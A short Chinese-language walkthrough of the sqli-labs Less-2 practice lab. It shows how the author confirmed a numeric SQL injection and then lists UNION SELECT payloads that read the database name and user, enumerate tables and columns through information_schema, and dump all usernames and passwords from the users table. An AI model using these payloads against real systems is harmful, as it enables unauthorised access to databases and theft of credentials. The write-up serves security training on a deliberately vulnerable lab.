sqli-labs less-2
判断注入类型
1、尝试id=1
?id=1
回显正常,结果如下:
2、尝试id=1'
?id=1'
回显报错,结果如下:
3、尝试id=1--+
?id=1--+
回显正常,结果如下:
4、结论
此题为数字型注入
2、查询当前数据库
?id=0 union select 1,database(),user()--+
查询结果如下图所示:
3、查询当前数据库下面的所有表
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
查询结果如下图所示:
4、查询数据表中的字段(以users表为例)
?id=0 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
查询结果如下图所示:
5、查询数据表中字段的值
?id=0 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
查询结果如下图所示:
以上就是我对这道题的解法。因本人菜鸡一只,如果有什么不对的地方,实属正常。还请各位大佬予以指正,谢谢!